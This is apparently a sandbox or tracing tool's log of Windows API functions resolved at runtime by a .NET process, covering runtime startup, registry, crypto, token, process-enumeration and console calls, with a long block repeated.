DynamicLoader: propsys.dll/InitVariantFromBuffer
DynamicLoader: OLEAUT32.dll/
DynamicLoader: propsys.dll/PropVariantToGUID
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: propsys.dll/PSCreateMemoryPropertyStore
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: profapi.dll/
DynamicLoader: LINKINFO.dll/CreateLinkInfoW
DynamicLoader: USER32.dll/IsCharAlphaW
DynamicLoader: USER32.dll/CharPrevW
DynamicLoader: ntshrui.dll/GetNetResourceFromLocalPathW
DynamicLoader: srvcli.dll/NetShareEnum
DynamicLoader: cscapi.dll/CscNetApiGetInterface
DynamicLoader: slc.dll/SLGetWindowsInformationDWORD
DynamicLoader: SHLWAPI.dll/PathRemoveFileSpecW
DynamicLoader: LINKINFO.dll/DestroyLinkInfo
DynamicLoader: propsys.dll/PropVariantToBoolean
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/GetSecurityInfo
DynamicLoader: ADVAPI32.dll/SetSecurityInfo
DynamicLoader: ADVAPI32.dll/GetSecurityDescriptorControl
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: mscoree.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: mscoreei.dll/RegisterShimImplCallback
DynamicLoader: mscoreei.dll/RegisterShimImplCleanupCallback
DynamicLoader: mscoreei.dll/SetShellShimInstance
DynamicLoader: mscoreei.dll/OnShimDllMainCalled
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx_RetAddr
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx
DynamicLoader: SHLWAPI.dll/UrlIsW
DynamicLoader: kernel32.dll/GetCurrentPackageId
DynamicLoader: kernel32.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: msvcrt.dll/_set_error_mode
DynamicLoader: msvcrt.dll/?set_terminate@@YAP6AXXZP6AXXZ@Z
DynamicLoader: msvcrt.dll/_get_terminate
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: mscoree.dll/GetProcessExecutableHeap
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap_RetAddr
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap
DynamicLoader: mscorwks.dll/SetLoadedByMscoree
DynamicLoader: mscorwks.dll/DllGetClassObjectInternal
DynamicLoader: mscorwks.dll/GetCLRFunction
DynamicLoader: ADVAPI32.dll/RegisterTraceGuidsW
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: ADVAPI32.dll/GetTraceLoggerHandle
DynamicLoader: ADVAPI32.dll/GetTraceEnableLevel
DynamicLoader: ADVAPI32.dll/GetTraceEnableFlags
DynamicLoader: ADVAPI32.dll/TraceEvent
DynamicLoader: mscoree.dll/IEE
DynamicLoader: mscoreei.dll/IEE_RetAddr
DynamicLoader: mscoreei.dll/IEE
DynamicLoader: mscorwks.dll/IEE
DynamicLoader: mscoree.dll/GetStartupFlags
DynamicLoader: mscoreei.dll/GetStartupFlags_RetAddr
DynamicLoader: mscoreei.dll/GetStartupFlags
DynamicLoader: mscoree.dll/GetHostConfigurationFile
DynamicLoader: mscoreei.dll/GetHostConfigurationFile_RetAddr
DynamicLoader: mscoreei.dll/GetHostConfigurationFile
DynamicLoader: mscoreei.dll/GetCORVersion_RetAddr
DynamicLoader: mscoreei.dll/GetCORVersion
DynamicLoader: mscoree.dll/GetCORSystemDirectory
DynamicLoader: mscoreei.dll/GetCORSystemDirectory_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream
DynamicLoader: ntdll.dll/RtlVirtualUnwind
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: kernel32.dll/SetThreadStackGuarantee
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/AddVectoredContinueHandler
DynamicLoader: kernel32.dll/RemoveVectoredContinueHandler
DynamicLoader: ADVAPI32.dll/ConvertSidToStringSidW
DynamicLoader: shell32.dll/SHGetFolderPathW
DynamicLoader: kernel32.dll/FlushProcessWriteBuffers
DynamicLoader: kernel32.dll/GetWriteWatch
DynamicLoader: kernel32.dll/ResetWriteWatch
DynamicLoader: kernel32.dll/CreateMemoryResourceNotification
DynamicLoader: kernel32.dll/QueryMemoryResourceNotification
DynamicLoader: kernel32.dll/GlobalMemoryStatusEx
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CoGetContextToken
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetUserDefaultUILanguage
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetVersionEx
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/GetVersionEx
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/GetFullPathName
DynamicLoader: kernel32.dll/GetFullPathNameW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetFileAttributesEx
DynamicLoader: kernel32.dll/GetFileAttributesExW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: version.dll/GetFileVersionInfoSize
DynamicLoader: version.dll/GetFileVersionInfoSizeW
DynamicLoader: version.dll/GetFileVersionInfo
DynamicLoader: version.dll/GetFileVersionInfoW
DynamicLoader: version.dll/VerQueryValue
DynamicLoader: version.dll/VerQueryValueW
DynamicLoader: kernel32.dll/lstrlen
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: mscoree.dll/ND_RI2
DynamicLoader: mscoreei.dll/ND_RI2_RetAddr
DynamicLoader: mscoreei.dll/ND_RI2
DynamicLoader: kernel32.dll/lstrlen
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/lstrcpy
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: version.dll/VerLanguageName
DynamicLoader: version.dll/VerLanguageNameW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetCurrentProcessIdW
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValue
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivileges
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivilegesW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/OpenProcessW
DynamicLoader: PSAPI.DLL/EnumProcessModules
DynamicLoader: PSAPI.DLL/EnumProcessModulesW
DynamicLoader: PSAPI.DLL/GetModuleInformation
DynamicLoader: PSAPI.DLL/GetModuleInformationW
DynamicLoader: PSAPI.DLL/GetModuleBaseName
DynamicLoader: PSAPI.DLL/GetModuleBaseNameW
DynamicLoader: PSAPI.DLL/GetModuleFileNameEx
DynamicLoader: PSAPI.DLL/GetModuleFileNameExW
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/GetExitCodeProcessW
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/NtQuerySystemInformationW
DynamicLoader: USER32.dll/EnumWindows
DynamicLoader: USER32.dll/EnumWindowsW
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: USER32.dll/GetWindowThreadProcessIdW
DynamicLoader: kernel32.dll/WerSetFlags
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguagesW
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguagesW
DynamicLoader: kernel32.dll/GetUserDefaultLocaleName
DynamicLoader: kernel32.dll/GetUserDefaultLocaleNameW
DynamicLoader: kernel32.dll/GetEnvironmentVariable
DynamicLoader: kernel32.dll/GetEnvironmentVariableW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyEx
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/CryptAcquireContextA
DynamicLoader: ADVAPI32.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/CryptCreateHash
DynamicLoader: ADVAPI32.dll/CryptDestroyHash
DynamicLoader: ADVAPI32.dll/CryptHashData
DynamicLoader: ADVAPI32.dll/CryptGetHashParam
DynamicLoader: ADVAPI32.dll/CryptImportKey
DynamicLoader: ADVAPI32.dll/CryptExportKey
DynamicLoader: ADVAPI32.dll/CryptGenKey
DynamicLoader: ADVAPI32.dll/CryptGetKeyParam
DynamicLoader: ADVAPI32.dll/CryptDestroyKey
DynamicLoader: ADVAPI32.dll/CryptVerifySignatureA
DynamicLoader: ADVAPI32.dll/CryptSignHashA
DynamicLoader: ADVAPI32.dll/CryptGetProvParam
DynamicLoader: ADVAPI32.dll/CryptGetUserKey
DynamicLoader: ADVAPI32.dll/CryptEnumProvidersA
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: mscoreei.dll/_CorDllMain_RetAddr
DynamicLoader: mscoreei.dll/_CorDllMain
DynamicLoader: mscoree.dll/GetTokenForVTableEntry
DynamicLoader: mscoree.dll/SetTargetForVTableEntry
DynamicLoader: mscoree.dll/GetTargetForVTableEntry
DynamicLoader: mscoreei.dll/LoadLibraryShim_RetAddr
DynamicLoader: mscoreei.dll/LoadLibraryShim
DynamicLoader: culture.dll/ConvertLangIdToCultureName
DynamicLoader: ole32.dll/CoCreateGuid
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfo
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfoW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: kernel32.dll/GetCurrentProcessW
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/GetTokenInformationW
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: kernel32.dll/LocalAllocW
DynamicLoader: mscoree.dll/ND_RI4
DynamicLoader: mscoreei.dll/ND_RI4_RetAddr
DynamicLoader: mscoreei.dll/ND_RI4
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx
DynamicLoader: ADVAPI32.dll/DuplicateTokenExW
DynamicLoader: ADVAPI32.dll/CheckTokenMembership
DynamicLoader: ADVAPI32.dll/CheckTokenMembershipW
DynamicLoader: kernel32.dll/GetConsoleTitle
DynamicLoader: kernel32.dll/GetConsoleTitleW
DynamicLoader: mscorjit.dll/getJit
DynamicLoader: mscorwks.dll/GetCLRFunction
DynamicLoader: kernel32.dll/SetConsoleTitle
DynamicLoader: kernel32.dll/SetConsoleTitleW
DynamicLoader: kernel32.dll/SetConsoleCtrlHandler
DynamicLoader: kernel32.dll/SetConsoleCtrlHandlerW
DynamicLoader: kernel32.dll/CreateEvent
DynamicLoader: kernel32.dll/CreateEventW
DynamicLoader: ntdll.dll/WinSqmIsOptedIn
DynamicLoader: kernel32.dll/ExpandEnvironmentStrings
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: shfolder.dll/SHGetFolderPath
DynamicLoader: shfolder.dll/SHGetFolderPathW
DynamicLoader: kernel32.dll/SetEnvironmentVariable
DynamicLoader: kernel32.dll/SetEnvironmentVariableW
DynamicLoader: kernel32.dll/GetACP
DynamicLoader: kernel32.dll/UnmapViewOfFile
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetFileType
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/GetSystemInfo
DynamicLoader: kernel32.dll/VirtualQuery
DynamicLoader: ADVAPI32.dll/RegQueryInfoKey
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumValue
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegEnumKeyEx
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: secur32.dll/GetUserNameEx
DynamicLoader: secur32.dll/GetUserNameExW
DynamicLoader: ADVAPI32.dll/GetUserName
DynamicLoader: ADVAPI32.dll/GetUserNameW
DynamicLoader: kernel32.dll/ReleaseMutex
DynamicLoader: ADVAPI32.dll/RegisterEventSource
DynamicLoader: ADVAPI32.dll/RegisterEventSourceW
DynamicLoader: ADVAPI32.dll/DeregisterEventSource
DynamicLoader: ADVAPI32.dll/ReportEvent
DynamicLoader: ADVAPI32.dll/ReportEventW
DynamicLoader: kernel32.dll/GetLogicalDrives
DynamicLoader: kernel32.dll/GetDriveType
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/GetVolumeInformation
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: kernel32.dll/GetCurrentDirectory
DynamicLoader: kernel32.dll/GetCurrentDirectoryW
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: mscoree.dll/IEE
DynamicLoader: kernel32.dll/GetStdHandle
DynamicLoader: kernel32.dll/GetStdHandleW
DynamicLoader: kernel32.dll/GetConsoleMode
DynamicLoader: kernel32.dll/GetConsoleModeW
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/SetThreadUILanguageW
DynamicLoader: kernel32.dll/FindFirstFile
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: CRYPTSP.dll/CryptExportKey
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: mscoree.dll/CorExitProcess
DynamicLoader: mscoreei.dll/CorExitProcess_RetAddr
DynamicLoader: mscoreei.dll/CorExitProcess
DynamicLoader: mscorwks.dll/CorExitProcess
DynamicLoader: mscorwks.dll/_CorDllMain
DynamicLoader: kernel32.dll/CreateActCtxW
DynamicLoader: kernel32.dll/AddRefActCtx
DynamicLoader: kernel32.dll/ReleaseActCtx
DynamicLoader: kernel32.dll/ActivateActCtx
DynamicLoader: kernel32.dll/DeactivateActCtx
DynamicLoader: kernel32.dll/GetCurrentActCtx
DynamicLoader: kernel32.dll/QueryActCtxW
DynamicLoader: netutils.dll/NetApiBufferFree
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/CopyFileExW
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: kernel32.dll/SetConsoleInputExeNameW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: shell32.dll/
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: shell32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ntdll.dll/RtlDllShutdownInProgress
DynamicLoader: LINKINFO.dll/IsValidLinkInfo
DynamicLoader: propsys.dll/
DynamicLoader: propsys.dll/PSGetNameFromPropertyKey
DynamicLoader: propsys.dll/PSStringFromPropertyKey
DynamicLoader: propsys.dll/InitVariantFromBuffer
DynamicLoader: OLEAUT32.dll/
DynamicLoader: propsys.dll/PropVariantToGUID
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: propsys.dll/PSCreateMemoryPropertyStore
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: profapi.dll/
DynamicLoader: LINKINFO.dll/CreateLinkInfoW
DynamicLoader: USER32.dll/IsCharAlphaW
DynamicLoader: USER32.dll/CharPrevW
DynamicLoader: ntshrui.dll/GetNetResourceFromLocalPathW
DynamicLoader: srvcli.dll/NetShareEnum
DynamicLoader: cscapi.dll/CscNetApiGetInterface
DynamicLoader: slc.dll/SLGetWindowsInformationDWORD
DynamicLoader: SHLWAPI.dll/PathRemoveFileSpecW
DynamicLoader: LINKINFO.dll/DestroyLinkInfo
DynamicLoader: propsys.dll/PropVariantToBoolean
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/GetSecurityInfo
DynamicLoader: ADVAPI32.dll/SetSecurityInfo
DynamicLoader: ADVAPI32.dll/GetSecurityDescriptorControl
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: mscoree.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: mscoreei.dll/RegisterShimImplCallback
DynamicLoader: mscoreei.dll/RegisterShimImplCleanupCallback
DynamicLoader: mscoreei.dll/SetShellShimInstance
DynamicLoader: mscoreei.dll/OnShimDllMainCalled
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx_RetAddr
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx
DynamicLoader: SHLWAPI.dll/UrlIsW
DynamicLoader: kernel32.dll/GetCurrentPackageId
DynamicLoader: kernel32.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: msvcrt.dll/_set_error_mode
DynamicLoader: msvcrt.dll/?set_terminate@@YAP6AXXZP6AXXZ@Z
DynamicLoader: msvcrt.dll/_get_terminate
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: mscoree.dll/GetProcessExecutableHeap
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap_RetAddr
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap
DynamicLoader: mscorwks.dll/SetLoadedByMscoree
DynamicLoader: mscorwks.dll/DllGetClassObjectInternal
DynamicLoader: mscorwks.dll/GetCLRFunction
DynamicLoader: ADVAPI32.dll/RegisterTraceGuidsW
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: ADVAPI32.dll/GetTraceLoggerHandle
DynamicLoader: ADVAPI32.dll/GetTraceEnableLevel
DynamicLoader: ADVAPI32.dll/GetTraceEnableFlags
DynamicLoader: ADVAPI32.dll/TraceEvent
DynamicLoader: mscoree.dll/IEE
DynamicLoader: mscoreei.dll/IEE_RetAddr
DynamicLoader: mscoreei.dll/IEE
DynamicLoader: mscorwks.dll/IEE
DynamicLoader: mscoree.dll/GetStartupFlags
DynamicLoader: mscoreei.dll/GetStartupFlags_RetAddr
DynamicLoader: mscoreei.dll/GetStartupFlags
DynamicLoader: mscoree.dll/GetHostConfigurationFile
DynamicLoader: mscoreei.dll/GetHostConfigurationFile_RetAddr
DynamicLoader: mscoreei.dll/GetHostConfigurationFile
DynamicLoader: mscoreei.dll/GetCORVersion_RetAddr
DynamicLoader: mscoreei.dll/GetCORVersion
DynamicLoader: mscoree.dll/GetCORSystemDirectory
DynamicLoader: mscoreei.dll/GetCORSystemDirectory_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream
DynamicLoader: ntdll.dll/RtlVirtualUnwind
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: kernel32.dll/SetThreadStackGuarantee
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/AddVectoredContinueHandler
DynamicLoader: kernel32.dll/RemoveVectoredContinueHandler
DynamicLoader: ADVAPI32.dll/ConvertSidToStringSidW
DynamicLoader: shell32.dll/SHGetFolderPathW
DynamicLoader: kernel32.dll/FlushProcessWriteBuffers
DynamicLoader: kernel32.dll/GetWriteWatch
DynamicLoader: kernel32.dll/ResetWriteWatch
DynamicLoader: kernel32.dll/CreateMemoryResourceNotification
DynamicLoader: kernel32.dll/QueryMemoryResourceNotification
DynamicLoader: kernel32.dll/GlobalMemoryStatusEx
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CoGetContextToken
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetUserDefaultUILanguage
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetVersionEx
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/GetVersionEx
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/GetFullPathName
DynamicLoader: kernel32.dll/GetFullPathNameW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetFileAttributesEx
DynamicLoader: kernel32.dll/GetFileAttributesExW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: version.dll/GetFileVersionInfoSize
DynamicLoader: version.dll/GetFileVersionInfoSizeW
DynamicLoader: version.dll/GetFileVersionInfo
DynamicLoader: version.dll/GetFileVersionInfoW
DynamicLoader: version.dll/VerQueryValue
DynamicLoader: version.dll/VerQueryValueW
DynamicLoader: kernel32.dll/lstrlen
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: mscoree.dll/ND_RI2
DynamicLoader: mscoreei.dll/ND_RI2_RetAddr
DynamicLoader: mscoreei.dll/ND_RI2
DynamicLoader: kernel32.dll/lstrlen
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/lstrcpy
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: version.dll/VerLanguageName
DynamicLoader: version.dll/VerLanguageNameW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetCurrentProcessIdW
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValue
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivileges
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivilegesW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/OpenProcessW
DynamicLoader: PSAPI.DLL/EnumProcessModules
DynamicLoader: PSAPI.DLL/EnumProcessModulesW
DynamicLoader: PSAPI.DLL/GetModuleInformation
DynamicLoader: PSAPI.DLL/GetModuleInformationW
DynamicLoader: PSAPI.DLL/GetModuleBaseName
DynamicLoader: PSAPI.DLL/GetModuleBaseNameW
DynamicLoader: PSAPI.DLL/GetModuleFileNameEx
DynamicLoader: PSAPI.DLL/GetModuleFileNameExW
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/GetExitCodeProcessW
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/NtQuerySystemInformationW
DynamicLoader: USER32.dll/EnumWindows
DynamicLoader: USER32.dll/EnumWindowsW
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: USER32.dll/GetWindowThreadProcessIdW
DynamicLoader: kernel32.dll/WerSetFlags
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguagesW
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguagesW
DynamicLoader: kernel32.dll/GetUserDefaultLocaleName
DynamicLoader: kernel32.dll/GetUserDefaultLocaleNameW
DynamicLoader: kernel32.dll/GetEnvironmentVariable
DynamicLoader: kernel32.dll/GetEnvironmentVariableW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyEx
